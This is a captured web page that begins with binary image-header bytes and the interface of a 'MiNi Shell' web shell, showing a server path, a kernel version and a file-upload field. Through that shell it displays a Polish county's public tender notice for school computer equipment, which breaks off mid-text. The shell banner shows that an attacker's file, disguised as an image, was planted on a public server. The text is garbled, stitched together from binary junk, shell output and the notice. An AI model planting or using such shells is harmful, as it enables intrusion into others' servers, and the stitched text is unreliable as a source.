JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241125/0061414301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” - POWÓRKA </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wołowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934800</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Piastowski 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatwolowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatwolowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” - POWÓRKA </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-32e3da21-a072-46a1-9aa8-97f24c354736</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00614143</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00067959/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim &#34; - POWTÓRKA</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt &#34;Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3&#34; w ramach Funduszy Europejskich Dolnego Śląska 2021 – 2027 współfinansowany ze środków Europejskiego Funduszu Społecznego Plus </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatwolowski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiatwolowski<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>W sytuacjach awaryjnych z wyjątkiem składania ofert Zamawiający dopuszcza komunikację elektroniczną poprzez e-mail:<br/>zamowienia@powiatwolowski.pl<br/>Szczegóły zostały zawarte w rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał<br/>wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na<br/>pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie<br/>przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>Szczegóły zostały zawarte w rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1)Administratorem Pani/Pana danych osobowych jest Starosta<br/>Wołowski, z siedzibą w: 56 – 100 Wołów, Pl. Piastowski 2, tel.: +48 71 380 59 01.2)Informujemy, że wyznaczyliśmy Inspektora Ochrony Danych. Może Pani/Pan skontaktować się z nim poprzez wiadomość wysłaną na adres e-mail: iod@powiatwolowski.pl lub<br/>listownie na adres: Starostwo Powiatowe w Wołowie, 56 – 100 Wołów, Pl. Piastowski 2.3)Pani/Pana dane osobowe przetwarzane<br/>będą na podstawie:<br/>-art. 6 ust. 1 lit. c RODO oraz ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych, dalej „ustawa Pzp’’, w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>W przypadku złożenia najkorzystniejszej oferty Administrator będzie przetwarzał dane osobowe w celu zawarcia i realizacji umowy<br/>(na podstawie art. 6 ust. 1 lit. b RODO), jak również do dochodzenia potencjalnych roszczeń związanych z zawartą umową (na<br/>podstawie art. 6 ust. 1 lit. f RODO) oraz w celach archiwalnych (na podstawie art. 6 ust. 1 lit. c RODO); dodatkowo, przepisy prawa<br/>wymagają od administratora danych przetwarzania danych dla celów podatkowych i rachunkowych.4)Odbiorcami Pani/Pana danych<br/>osobowych będą:<br/>-podmioty upoważnione na podstawie przepisów prawa,<br/>-osoby lub podmioty, którym udostępniona zostanie dokumentacja niniejszego postępowania zgodnie z art. 18 oraz art. 74 ustawy<br/>Pzp,<br/>-podmioty wykonujące zadania zlecone przez Administratora, w szczególności: dostawcy usług IT, podmioty prowadzące<br/>działalność pocztową lub kurierską, podmioty świadczące usługi prawnicze, przy czym takie podmioty będą przetwarzać dane na<br/>podstawie umowy i wyłącznie zgodnie z jego poleceniami.5)Okres przechowywania danych:a)w odniesieniu do podmiotów, których<br/>oferta nie została wybrana - przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,b)w<br/>przypadku zawarcia umowy - do momentu obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania, a także po<br/>jej zakończeniu, tj.:<br/>-przez okres 5 lat od dnia zakończenia niniejszego postępowania,<br/>-dane zawarte na umowie – do czasu przedawnienia lub wygaśnięcia na innej podstawie ewentualnych roszczeń wynikających z<br/>umowy, -w celach wynikających z przepisów prawa, w szczególności obowiązku przechowywania dokumentów księgowych,<br/>wystawienia faktur itp.,6)Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.7)Pani/Pana dane osobowe nie będą<br/>przekazywane do państw trzecich, nie będą przetwarzane w sposób zautomatyzowany, nie będą poddawane profilowaniu.8)Posiada<br/>Pani/Pan:a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,b)na podstawie art. 16 RODO<br/>prawo do sprostowania Pani/Pana danych osobowych ,c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ,d)prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO;9)Nie przysługuje Pani/Panu:a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych,b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,c)na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIT.272.27.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego<br/>powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” w ramach<br/>programu Fundusze Europejskie dla Dolnego Śląska 2021-2027. Szczegółowy opis przedmiotu zmówienia: został zawarty w<br/>opisie przedmiotu zamówienia – załącznik nr 1 do SWZ oraz w formularzu cenowym – załącznik nr 5.1 do SWZ. Część 1 -<br/>Monitory interaktywne dla ZSZ w Wołowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33195100-4 - Monitory</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował poniższym kryterium oceny:<br/>l.p. Kryterium Opis Waga – udział w ocenie<br/>1 Cena Cena oferty (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty<br/>ponoszone przez wykonawcę 60% = 60 pkt<br/>2 Gwarancja Okres gwarancji zaoferowany przez Wykonawcę na formularzu oferty. 40% = 40 pkt<br/>2. W kryterium ceny ocenie poddana zostanie cena oferty brutto obliczona przez wykonawcę zgodnie zobowiązującymi przepisami<br/>prawa, zasadami określonymi w Rozdziale 16 SWZ i podana w „Formularzu ofertowym” (wg. wzoru zał. nr 2 do SWZ) – CENA – 60%<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:<br/>Liczba punktów = Cena brutto najniższej zaproponowanej oferty/ Cena brutto oferty badanej x 60<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>3. W kryterium gwarancja ocenie zostanie poddany okres gwarancji wskazany przez Wykonawcę w formularzu oferty. <br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco: <br/>Zaoferowany okres gwarancji	Liczba punktów<br/>24 miesiące	0 pkt (0%)<br/>30 miesięcy	20 pkt (20%)<br/>36 miesięcy	40 pkt (40%)<br/>Przez „okres gwarancji” należy rozumieć oferowany przez Wykonawcę okres gwarancji jakości na przedmiot zamówienia (liczonych w miesiącach) , licząc od daty odbioru ostatecznego (końcowego). <br/>Minimalny, wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące. Oferty Wykonawców, którzy zaoferują okres gwarancji krótszy niż wskazany w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ. Jeżeli Wykonawca zaoferuje okres gwarancji inny niż 24, 30 lub 36 miesięcy, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany w ofercie Wykonawcy okres zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący.<br/>Wykonawca udzieli minimum 24 miesięcy gwarancji, maksymalnie 36 miesięcy gwarancji na przedmiot zamówienia zgodnie umową, licząc od daty dokonania odbioru końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy, Zamawiający do oceny ofert przyjmie okres 36 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 24 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Maksymalnie w kryterium okres gwarancji Zamawiający przyzna ofercie 40 punktów.<br/>ŁĄCZNA LICZBA PUNKTÓW = KRYTERIUM CENA + KRYTERIUM OKRES GWARANCJI. <br/>3.	Uzyskana liczba punktów w ramach danego kryterium zaokrąglana będzie do drugiego miejsca po przecinku. <br/>4.	Zamawiający za najkorzystniejszą uzna ofertę, która oraz uzyska największą łączną liczbę punktów przyznanych w ramach wszystkich ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego<br/>powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” w ramach<br/>programu Fundusze Europejskie dla Dolnego Śląska 2021-2027. Szczegółowy opis przedmiotu zmówienia: został zawarty w<br/>opisie przedmiotu zamówienia – załącznik nr 1 do SWZ oraz w formularzu cenowym – załącznik nr 5.2 do SWZ. Część 2 -<br/>Sprzęt multimedialny do pracowni urządzeń technik komputerowych w Centrum Kształcenia Zawodowego i Ustawicznego w<br/>Wołowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213300-8 - Komputer biurkowy</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30237460-1 - Klawiatury komputerowe</p> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30121430-6 - Cyfrowe urządzenia powielające</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <p class="mb-0">30237450-8 - Tablety graficzne</p> <p class="mb-0">30233000-1 - Urządzenia do przechowywania i odczytu danych</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował poniższym kryterium oceny:<br/>l.p. Kryterium Opis Waga – udział w ocenie<br/>1 Cena Cena oferty (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty<br/>ponoszone przez wykonawcę 60% = 60 pkt<br/>2 Gwarancja Okres gwarancji zaoferowany przez Wykonawcę na formularzu oferty. 40% = 40 pkt<br/>2. W kryterium ceny ocenie poddana zostanie cena oferty brutto obliczona przez wykonawcę zgodnie zobowiązującymi przepisami<br/>prawa, zasadami określonymi w Rozdziale 16 SWZ i podana w „Formularzu ofertowym” (wg. wzoru zał. nr 2 do SWZ) – CENA – 60%<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:<br/>Liczba punktów = Cena brutto najniższej zaproponowanej oferty/ Cena brutto oferty badanej x 60<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>3. W kryterium gwarancja ocenie 